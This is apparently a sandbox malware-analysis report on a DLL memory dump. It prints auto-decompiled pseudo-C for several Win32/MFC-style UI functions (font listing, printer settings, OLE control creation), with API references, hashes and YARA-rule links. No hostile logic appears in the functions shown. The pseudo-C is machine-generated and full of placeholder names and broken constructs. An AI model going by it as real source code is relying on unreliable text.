				_t107 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v92 + 0xe8)) + 0x17c))))(_v92, 0x50002800, 0xe800, _t102 ^ _t236,  *[fs:0x0], 0x10054938, 0xffffffff);
				_t239 = _t107;
				if(_t107 == 0 || E10015763(__ebx, _v92 + 0xe8, __edi, _t239, 0x90) == 0) {
					_t108 = 0;
				} else {
					_v40 = _v92 + 0xe8;
					E100121C7(_v40, 0, 0x800, 0);
					_v56 =  *((intOrPtr*)(_v92 + 0x16c));
					E10012DDA(_v92 + 0xe8, _v56 | 0x34);
					E10015092(__ebx, _v92 + 0xe8, _v56 | 0x34, __edi, __eflags, 0, 0x68, 1, 0x96);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v92 + 0xe8)) + 0x184))))(0,  &_v32);
					_v28 = 3;
					_v20 = _v28 + 0xc8;
					__eflags =  *((intOrPtr*)( *((intOrPtr*)( *(_v92 + 0x1a4) + 0x13c))))(0x10210102,  &_v32, _v92 + 0xe8, 0x68);
					if(__eflags != 0) {
						_v60 = E1000B1CC(__ebx, _v92, __edi, __esi, __eflags, GetDC( *(_v92 + 0x20)));
						EnumFontFamiliesA( *(_v60 + 4), 0, E10008260, _v92 + 0x1a4);
						E10015092(__ebx, _v92 + 0xe8,  *(_v60 + 4), __edi, __eflags, 1, 0x69, 1, 0x32);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v92 + 0xe8)) + 0x184))))(1,  &_v32);
						_v28 = 3;
						_v20 = _v28 + 0xc8;
						_v32 = _v32 + 5;
						_t135 =  *((intOrPtr*)(_v92 + 0x1f8));
						_t224 =  *((intOrPtr*)(_t135 + 0x13c));
						_t136 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0x13c))))(0x10010003,  &_v32, _v92 + 0xe8, 0x69);
						__eflags = _t136;
						if(_t136 != 0) {
							E10001670( &_v44);
							_v8 = 0;
							_v48 = 0;
							while(1) {
								__eflags = _v48 - 7;
								if(__eflags >= 0) {
									break;
								}
								E10001A10( &_v44, 0x10060c2c,  *((intOrPtr*)(0x1009272c + _v48 * 4)));
								_t238 = _t238 + 0xc;
								_v76 = _v44;
								_t224 = _v76;
								SendMessageA( *(_v92 + 0x218), 0x143, 0, _v76);
								_t157 = _v48 + 1;
								__eflags = _t157;
								_v48 = _t157;
							}
							E10014D71(_t158, _v92 + 0xe8, _t224, _t234, __eflags, 3, 8);
							E10014D71(_t158, _v92 + 0xe8, _t224, _t234, __eflags, 8, 8);
							E1000B49C(_t158, _v92 + 0x24c, _t234, GetStockObject(0x11));
							_t226 = _v92 + 0x24c;
							__eflags = _t226;
							_v80 = _t226;
							if(_t226 != 0) {
								_v96 =  *((intOrPtr*)(_v80 + 4));
							} else {
								_v96 = 0;
							}
							SendMessageA( *(_v92 + 0x1c4), 0x30, _v96, 1);
							_t229 = _v92 + 0x24c;
							__eflags = _t229;
							_v84 = _t229;
							if(_t229 != 0) {
								_v100 =  *((intOrPtr*)(_v84 + 4));
							} else {
								_v100 = 0;
							}
							SendMessageA( *(_v92 + 0x218), 0x30, _v100, 1);
							SendMessageA( *(_v92 + 0x1c4), 0x14e, 0xffffffff, 0);
							SendMessageA( *(_v92 + 0x218), 0x14e, 0xffffffff, 0);
							_v52 = 1;
							_v8 = 0xffffffff;
							E10001740( &_v44);
							_t108 = _v52;
						} else {
							_t108 = 0;
						}
					} else {
						_t108 = 0;
					}
				}
				 *[fs:0x0] = _v16;
				return _t108;
			}

0x10008290
0x10008290
0x100082a1
0x100082a4
0x100082af
0x100082b5
0x100082b8
0x100082e5
0x100082e7
0x100082e9
0x10008306
0x1000830d
0x10008316
0x10008325
0x10008333
0x1000834c
0x10008365
0x10008388
0x1000838a
0x10008399
0x100083cb
0x100083cd
0x100083e9
0x10008403
0x1000841a
0x1000843d
0x1000843f
0x1000844e
0x10008457
0x1000847b
0x10008481
0x10008487
0x10008489
0x1000848b
0x10008497
0x1000849c
0x100084a3
0x100084b5
0x100084b5
0x100084b9
0x00000000
0x00000000
0x100084cf
0x100084d4
0x100084da
0x100084dd
0x100084f2
0x100084af
0x100084af
0x100084b2
0x100084b2
0x10008507
0x10008519
0x10008530
0x10008538
0x10008538
0x1000853e
0x10008541
0x10008552
0x10008543
0x10008543
0x10008543
0x10008567
0x10008570
0x10008570
0x10008576
0x10008579
0x1000858a
0x1000857b
0x1000857b
0x1000857b
0x1000859f
0x100085b8
0x100085d1
0x100085d7
0x100085de
0x100085e8
0x100085ed
0x1000848d
0x1000848d
0x1000848d
0x100083cf
0x100083cf
0x100083cf
0x100083cd
0x100085f3
0x100085fe

APIs

Part of subcall function 10015763: FindResourceA.KERNEL32(?,10008152,000000F1), ref: 1001577F

GetDC.USER32(?), ref: 100083DD
EnumFontFamiliesA.GDI32(00000000,00000000,10008260,?), ref: 10008403

Part of subcall function 10015092: _memcpy_s.LIBCMT ref: 100150BF
Part of subcall function 10015092: _memcmp.LIBCMT ref: 100150EC

SendMessageA.USER32(?,00000143,00000000,?), ref: 100084F2
GetStockObject.GDI32(00000011), ref: 10008520
SendMessageA.USER32(?,00000030,00000000,00000001), ref: 10008567
SendMessageA.USER32(?,00000030,?,00000001), ref: 1000859F
SendMessageA.USER32(?,0000014E,000000FF,00000000), ref: 100085B8
SendMessageA.USER32(?,0000014E,000000FF,00000000), ref: 100085D1

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$EnumFamiliesFindFontObjectResourceStock_memcmp_memcpy_s
String ID:
API String ID: 2603851596-0
Opcode ID: b854a75307ac27bd7a21f29a5f5ebc1df9cab7b41a9cf5832e3a0697988141d7
Instruction ID: ee17291e6e4c9cf4e5eb0c5680cb63f3cafad4b09abe4e9a9ebc011b5b667f4f
Opcode Fuzzy Hash: b854a75307ac27bd7a21f29a5f5ebc1df9cab7b41a9cf5832e3a0697988141d7
Instruction Fuzzy Hash: 9DA13774A402499BEB04CBD4CC95FEEBBB5FF88304F148528E605AF38ADB71A945CB54

Uniqueness

Uniqueness Score: -1.00%

Function 100198DC, Relevance: 12.1, APIs: 8, Instructions: 66
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E100198DC(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E100270D1(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E100270D1( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x100198e1
0x100198e3
0x100198e5
0x100198ed
0x10019907
0x1001990f
0x10019919
0x10019920
0x10019922
0x10019927
0x1001992a
0x1001992a
0x10019941
0x10019948
0x10019960
0x10019965
0x1001996a
0x1001996a
0x10019970
0x10019970
0x10019920
0x10019975
0x10019979

APIs

GlobalLock.KERNEL32 ref: 100198FB
lstrcmpA.KERNEL32(?,?,?,?,?,?,?,100104B6,?), ref: 10019907
OpenPrinterA.WINSPOOL.DRV(?,?,00000000,?,?,?,?,?,100104B6,?), ref: 10019919
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,100104B6,?), ref: 10019939
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 10019941
GlobalLock.KERNEL32 ref: 1001994B
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,100104B6,?), ref: 10019958
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,100104B6,?), ref: 10019970

Part of subcall function 100270D1: GlobalFlags.KERNEL32(?), ref: 100270E0
Part of subcall function 100270D1: GlobalUnlock.KERNEL32(?,?,?,?,1001A262,?,00000214,1000367F), ref: 100270F2
Part of subcall function 100270D1: GlobalFree.KERNEL32 ref: 100270FD

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: dde02dd2b5fef8448ab6bd61cf99fe365eee603f882ececa5124335647a04cfd
Instruction ID: 58ff9e02c24a6d146ba27598b298866281b13c5c349f54d47fee500fd27d6f76
Opcode Fuzzy Hash: dde02dd2b5fef8448ab6bd61cf99fe365eee603f882ececa5124335647a04cfd
Instruction Fuzzy Hash: 1D113075500604BBDB229BBADC89DAF7AFDFB89740B100519F605D6121DB31DD81DB21

Uniqueness

Uniqueness Score: -1.00%

Function 1001C146, Relevance: 10.7, APIs: 7, Instructions: 242
memoryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E1001C146(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t136;
				int _t141;
				signed short _t144;
				short* _t145;
				intOrPtr _t149;
				signed short _t173;
				intOrPtr _t174;
				signed int _t175;
				intOrPtr _t180;
				struct tagRECT _t186;
				int _t187;
				signed short _t189;
				signed short _t190;
				void* _t191;
				void* _t217;
				intOrPtr _t221;
				short _t222;
				intOrPtr _t223;
				intOrPtr* _t230;
				signed short* _t232;
				signed int _t235;
				signed short* _t236;
				signed short* _t238;
				signed short* _t239;
				void* _t240;

				_push(0x9c);
				E10041D14(0x100529ba, __ebx, __edi, __esi);
				_t230 =  *((intOrPtr*)(_t240 + 0x14));
				_t232 =  *(_t240 + 0x1c);
				 *((intOrPtr*)(_t240 - 0x3c)) =  *((intOrPtr*)(_t240 + 8));
				 *(_t240 - 0x50) =  *(_t240 + 0xc);
				 *((intOrPtr*)(_t240 - 0x44)) =  *((intOrPtr*)(_t240 + 0x24));
				_t136 = _t230 + 0x12;
				 *((intOrPtr*)(_t240 - 0x2c)) = _t136;
				if( *((intOrPtr*)(_t240 + 0x10)) != 0) {
					 *((intOrPtr*)(_t240 - 0x6c)) =  *((intOrPtr*)(_t230 + 8));
					 *((intOrPtr*)(_t240 - 0x68)) =  *((intOrPtr*)(_t230 + 4));
					 *((short*)(_t240 - 0x64)) =  *((intOrPtr*)(_t230 + 0xc));
					 *((short*)(_t240 - 0x62)) =  *((intOrPtr*)(_t230 + 0xe));
					 *((short*)(_t240 - 0x5e)) =  *_t136;
					_t221 = _t230 + 0x18;
					 *((short*)(_t240 - 0x60)) =  *(_t230 + 0x10);
					 *((short*)(_t240 - 0x5c)) =  *((intOrPtr*)(_t230 + 0x14));
					_t230 = _t240 - 0x6c;
					 *((intOrPtr*)(_t240 - 0x2c)) = _t221;
				}
				_t222 =  *((short*)(_t230 + 0xa));
				_t186 =  *((short*)(_t230 + 8));
				 *((intOrPtr*)(_t240 - 0x70)) =  *((short*)(_t230 + 0xe)) + _t222;
				 *(_t240 - 0x7c) = _t186;
				 *((intOrPtr*)(_t240 - 0x78)) = _t222;
				 *((intOrPtr*)(_t240 - 0x74)) =  *((short*)(_t230 + 0xc)) + _t186;
				_t141 = MapDialogRect( *( *((intOrPtr*)(_t240 - 0x3c)) + 0x20), _t240 - 0x7c);
				 *(_t240 - 0x34) =  *(_t240 - 0x34) & 0x00000000;
				if( *((intOrPtr*)(_t240 + 0x20)) >= 4) {
					_t190 =  *_t232;
					 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)(_t240 + 0x20)) - 4;
					_t232 =  &(_t232[2]);
					if(_t190 > 0) {
						__imp__#4(_t232, _t190);
						_t191 = _t190 + _t190;
						_t232 = _t232 + _t191;
						 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)(_t240 + 0x20)) - _t191;
						 *(_t240 - 0x34) = _t141;
					}
				}
				 *(_t240 - 0x38) =  *(_t240 - 0x38) & 0x00000000;
				E10001670(_t240 - 0x30);
				 *((intOrPtr*)(_t240 - 4)) = 0;
				 *(_t240 - 0x4c) = 0;
				 *(_t240 - 0x48) = 0;
				 *(_t240 - 0x40) = 0;
				if( *((intOrPtr*)(_t240 + 0x18)) == 0x37a ||  *((intOrPtr*)(_t240 + 0x18)) == 0x37b) {
					_t144 =  *_t232;
					_t55 = _t144 - 0xc; // 0x36f
					_t223 = _t55;
					_t232 =  &(_t232[6]);
					 *(_t240 - 0x58) = _t144;
					 *((intOrPtr*)(_t240 - 0x28)) = _t223;
					if(_t223 <= 0) {
						L16:
						 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)(_t240 + 0x20)) - _t144;
						 *((intOrPtr*)(_t240 + 0x18)) =  *((intOrPtr*)(_t240 + 0x18)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t173 =  *_t232;
						 *((intOrPtr*)(_t240 - 0x28)) =  *((intOrPtr*)(_t240 - 0x28)) - 6;
						_t236 =  &(_t232[2]);
						_t189 =  *_t236 & 0x0000ffff;
						_t232 =  &(_t236[1]);
						 *(_t240 - 0x54) = _t173;
						if(_t173 != 0x80010001) {
							_t174 = E100092FB(__eflags, 0x1c);
							 *((intOrPtr*)(_t240 - 0x80)) = _t174;
							 *((char*)(_t240 - 4)) = 1;
							__eflags = _t174;
							if(_t174 == 0) {
								_t175 = 0;
								__eflags = 0;
							} else {
								_t175 = E1002C689(_t174,  *(_t240 - 0x38),  *(_t240 - 0x54), _t189);
							}
							 *((char*)(_t240 - 4)) = 0;
							 *(_t240 - 0x38) = _t175;
						} else {
							_t238 =  &(_t232[2]);
							 *(_t240 - 0x48) =  *_t232;
							_t239 =  &(_t238[6]);
							 *(_t240 - 0x40) =  *_t238;
							E10002DB0(_t240 - 0x30, _t239);
							_t180 =  *((intOrPtr*)( *((intOrPtr*)(_t240 - 0x30)) - 0xc));
							_t217 = 0xffffffef;
							 *((intOrPtr*)(_t240 - 0x28)) =  *((intOrPtr*)(_t240 - 0x28)) + _t217 - _t180;
							_t232 = _t239 + _t180 + 1;
							 *(_t240 - 0x4c) = _t189 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t240 - 0x28)) > 0);
					_t144 =  *(_t240 - 0x58);
					goto L16;
				} else {
					L17:
					_t145 =  *((intOrPtr*)(_t240 - 0x2c));
					_t253 =  *_t145 - 0x7b;
					_push(_t240 - 0x20);
					_push(_t145);
					if( *_t145 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t187 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t240 + 0x20)));
					_push(_t232);
					 *((intOrPtr*)(_t240 - 0x2c)) = _t145;
					E10038096(0, _t240 - 0xa8, _t230, _t232, _t253);
					asm("sbb esi, esi");
					_t235 =  ~( *((intOrPtr*)(_t240 + 0x18)) - 0x00000378 & 0x0000ffff) & _t240 - 0x000000a8;
					_t254 =  *((intOrPtr*)(_t240 - 0x2c));
					 *((char*)(_t240 - 4)) = 2;
					 *((intOrPtr*)(_t240 - 0x24)) = 0;
					if( *((intOrPtr*)(_t240 - 0x2c)) >= 0) {
						_push(1);
						if(E10031B03(0,  *((intOrPtr*)(_t240 - 0x3c)), _t230, _t235, _t254) != 0 && E100320F5( *((intOrPtr*)( *((intOrPtr*)(_t240 - 0x3c)) + 0x4c)), 0, _t240 - 0x20, 0,  *_t230, _t240 - 0x7c,  *(_t230 + 0x10) & 0x0000ffff, _t235, 0 |  *((intOrPtr*)(_t240 + 0x18)) == 0x00000377,  *(_t240 - 0x34), _t240 - 0x24) != 0) {
							E1002BC4C( *((intOrPtr*)(_t240 - 0x24)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t240 - 0x24)) + 0x24),  *(_t240 - 0x50), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t240 - 0x24)) + 0x94) =  *(_t240 - 0x38);
							E10002B30( *((intOrPtr*)(_t240 - 0x24)) + 0xa4, _t240 - 0x30);
							 *((short*)( *((intOrPtr*)(_t240 - 0x24)) + 0x98)) =  *(_t240 - 0x4c);
							 *( *((intOrPtr*)(_t240 - 0x24)) + 0x9c) =  *(_t240 - 0x48);
							 *( *((intOrPtr*)(_t240 - 0x24)) + 0xa0) =  *(_t240 - 0x40);
						}
					}
					if( *(_t240 - 0x34) != _t187) {
						__imp__#6( *(_t240 - 0x34));
					}
					_t149 =  *((intOrPtr*)(_t240 - 0x24));
					if(_t149 == _t187) {
						 *((intOrPtr*)( *((intOrPtr*)(_t240 - 0x44)))) = _t187;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t240 - 0x44)))) =  *((intOrPtr*)(_t149 + 0x24));
						_t187 = 1;
					}
					 *((char*)(_t240 - 4)) = 0;
					E10038416(_t187, _t240 - 0xa8, _t230, _t235, 1);
					E10001020( *((intOrPtr*)(_t240 - 0x30)) + 0xfffffff0);
					return E10041D97(_t187, _t230, _t235);
				}
			}

0x1001c146
0x1001c150
0x1001c15c
0x1001c15f
0x1001c162
0x1001c168
0x1001c16e
0x1001c171
0x1001c174
0x1001c177
0x1001c17f
0x1001c185
0x1001c18c
0x1001c196
0x1001c19e
0x1001c1a6
0x1001c1a9
0x1001c1ad
0x1001c1b1
0x1001c1b4
0x1001c1b4
0x1001c1b7
0x1001c1bf
0x1001c1c9
0x1001c1d8
0x1001c1db
0x1001c1de
0x1001c1e1
0x1001c1e7
0x1001c1ef
0x1001c1f1
0x1001c1f3
0x1001c1f7
0x1001c1fc
0x1001c200
0x1001c206
0x1001c208
0x1001c20a
0x1001c20d
0x1001c20d
0x1001c1fc
0x1001c210
0x1001c217
0x1001c223
0x1001c226
0x1001c229
0x1001c22c
0x1001c233
0x1001c240
0x1001c242
0x1001c242
0x1001c245
0x1001c248
0x1001c24b
0x1001c250
0x1001c2d6
0x1001c2d6
0x1001c2d9
0x00000000
0x00000000
0x00000000
0x00000000
0x1001c256
0x1001c256
0x1001c256
0x1001c258
0x1001c25c
0x1001c25f
0x1001c263
0x1001c264
0x1001c26c
0x1001c2a3
0x1001c2a9
0x1001c2ac
0x1001c2b0
0x1001c2b2
0x1001c2c4
0x1001c2c4
0x1001c2b4
0x1001c2bd
0x1001c2bd
0x1001c2c6
0x1001c2ca
0x1001c26e
0x1001c270
0x1001c273
0x1001c278
0x1001c27f
0x1001c282
0x1001c28a
0x1001c28f
0x1001c292
0x1001c295
0x1001c29c
0x1001c29c
0x1001c2cd
0x1001c2d3
0x00000000
0x1001c2e0
0x1001c2e0
0x1001c2e0
0x1001c2e3
0x1001c2ea
0x1001c2eb
0x1001c2ec
0x1001c2f6
0x1001c2ee
0x1001c2ee
0x1001c2ee
0x1001c2fc
0x1001c2fe
0x1001c2ff
0x1001c308
0x1001c309
0x1001c30c
0x1001c322
0x1001c32a
0x1001c32c
0x1001c32f
0x1001c333
0x1001c336
0x1001c33f
0x1001c348
0x1001c38a
0x1001c39e
0x1001c3aa
0x1001c3bd
0x1001c3c9
0x1001c3d6
0x1001c3e2
0x1001c3e2
0x1001c348
0x1001c3eb
0x1001c3f0
0x1001c3f0
0x1001c3f6
0x1001c3fb
0x1001c42f
0x1001c3fd
0x1001c405
0x1001c407
0x1001c407
0x1001c40e
0x1001c412
0x1001c41d
0x1001c429
0x1001c429

APIs

__EH_prolog3_GS.LIBCMT ref: 1001C150
MapDialogRect.USER32(?,?), ref: 1001C1E1
SysAllocStringLen.OLEAUT32(?,?), ref: 1001C200
CLSIDFromString.OLE32(?,00000004), ref: 1001C2EE

Part of subcall function 100092FB: _malloc.LIBCMT ref: 10009319

CLSIDFromProgID.OLE32(?,00000004), ref: 1001C2F6
SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,00000000,?,00000000), ref: 1001C39E
SysFreeString.OLEAUT32(00000000), ref: 1001C3F0

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: String$From$AllocDialogFreeH_prolog3_ProgRectWindow_malloc
String ID:
API String ID: 2980224915-0
Opcode ID: 6622ed0360d6fc49196ae37b631e58a19bf76a33a6a924918921521a122d96ae
Instruction ID: f65dad2c7254e8655a792fdc5a8905942d0520f7c2dc89783ac93abcc532727c
Opcode Fuzzy Hash: 6622ed0360d6fc49196ae37b631e58a19bf76a33a6a924918921521a122d96ae
Instruction Fuzzy Hash: 5CA11575D00219EFDB14CFA8C884AEDBBF4FF08344F104129E819AB251E775AA84CB64

Uniqueness

Uniqueness Score: -1.00%

Function 1002AF2D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1002AF2D(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				signed int _t54;
				void* _t65;
				char* _t69;
				short* _t70;
				signed int _t72;
				signed int* _t83;
				short* _t84;
				void* _t93;
				signed int* _t101;
				signed int _t102;
				void** _t103;
				intOrPtr _t105;
				signed int _t107;
				signed int _t109;
				void* _t110;

				_t104 = __esi;
				_t99 = __edx;
				_t82 = __ebx;
				_t54 =  *0x1006d940; // 0xc2bf211
				_v8 = _t54 ^ _t109;
				_t103 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E1002AD61(_t83);
					_t105 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t105;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t65 = 0;
					} else {
						_t69 = _t105 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t69;
						if(_t69 < _t105) {
							goto L15;
						} else {
							_t70 = E1002ADA8(_t83);
							_t93 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t93 = _t105 + 2 + E1004204F(_t84 + _t105) * 2;
							}
							_t33 =  &(_v76[3]); // 0x3
							_t101 = _v84;
							_t36 = _t84 + 3; // 0x3
							_t72 = _t93 + _t36 & 0xfffffffc;
							_t107 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t102 =  *(_t101 + 8) & 0x0000ffff;
							} else {
								_t102 =  *(_t101 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t93 || _t102 <= 0) {
								L17:
								 *_t84 = _a8;
								_t99 =  &_v72;
								E1001E579(_t84 + _v92, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t103[1] = _t103[1] + _t107 - _v80;
								GlobalUnlock( *_t103);
								_t103[2] = _t103[2] & 0x00000000;
								_t65 = 1;
							} else {
								_t99 = _t103[1];
								_t97 = _t99 - _t72 + _v84;
								if(_t99 - _t72 + _v84 <= _t99) {
									E1001E579(_t84, _t107, _t97, _t72, _t97);
									_t110 = _t110 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t104);
					_pop(_t82);
				} else {
					_t65 = 0;
				}
				return E1003F29E(_t65, _t82, _v8 ^ _t109, _t99, _t103, _t104);
			}

0x1002af2d
0x1002af2d
0x1002af2d
0x1002af35
0x1002af3c
0x1002af43
0x1002af49
0x1002af4c
0x1002af55
0x1002af56
0x1002af5f
0x1002af70
0x1002af73
0x1002af7b
0x1002af91
0x1002af93
0x1002af96
0x1002af9e
0x1002af98
0x1002af98
0x1002af98
0x1002afad
0x1002b02b
0x1002b02b
0x1002afaf
0x1002afc4
0x1002afc9
0x1002afcc
0x00000000
0x1002afce
0x1002afcf
0x1002afd5
0x1002afd7
0x1002afdc
0x1002afe8
0x1002afe8
0x1002afef
0x1002aff3
0x1002aff6
0x1002affa
0x1002affd
0x1002b004
0x1002b007
0x1002b00f
0x1002b009
0x1002b009
0x1002b009
0x1002b016
0x1002b03b
0x1002b042
0x1002b04b
0x1002b053
0x1002b060
0x1002b063
0x1002b069
0x1002b06f
0x1002b01d
0x1002b01d
0x1002b024
0x1002b029
0x1002b033
0x1002b038
0x00000000
0x00000000
0x00000000
0x00000000
0x1002b029
0x1002b016
0x1002afcc
0x1002b070
0x1002b071
0x1002af4e
0x1002af4e
0x1002af4e
0x1002b07e

APIs

GlobalLock.KERNEL32 ref: 1002AF59
lstrlenA.KERNEL32(?), ref: 1002AFA4
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002AFBE
_wcslen.LIBCMT ref: 1002AFE2

Strings

System, xrefs: 1002AF55

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
String ID: System
API String ID: 4253822919-3470857405
Opcode ID: 819e1db6c78240db9349aa97756668e199654c7d90748abf656adec5f1cdd41f
Instruction ID: 47969e16f3e3fa395a8ac34a0450304a2d832e7f23eed787161b0f4a7d051112
Opcode Fuzzy Hash: 819e1db6c78240db9349aa97756668e199654c7d90748abf656adec5f1cdd41f
Instruction Fuzzy Hash: DD41E271D00219DFDB14DFA4DC85AAEBBB5FF04310F54822AE816DB285EB74AD85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10014BCF, Relevance: 10.6, APIs: 7, Instructions: 127
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E10014BCF(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v17;
				char _v18;
				signed int _v19;
				char _v28;
				long _v32;
				signed int _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				signed int _t50;
				signed char _t57;
				void* _t68;
				void* _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				signed int _t89;

				_t86 = __edx;
				_t43 =  *0x1006d940; // 0xc2bf211
				_v8 = _t43 ^ _t89;
				_t87 = _a8;
				_t88 = __ecx;
				_push( &_v28);
				_push(_a4);
				_push(0x417);
				 *((intOrPtr*)( *__ecx + 0x118))();
				 *(_t87 + 8) =  *(_t87 + 8) ^ 0x00000004;
				_v18 = 0;
				_v17 = 0;
				 *((char*)(_t87 + 0xa)) = 0;
				 *((char*)(_t87 + 0xb)) = 0;
				if(E1003FFA2(_t87,  &_v28, 0x14) != 0) {
					_t50 = E10012193(_t88);
					_t69 = _t50;
					_v36 = _t50;
					E100121C7(_t88, 0x10000000, 0, 0);
					 *((intOrPtr*)( *_t88 + 0x118))(0x416, _a4, 0, _t68);
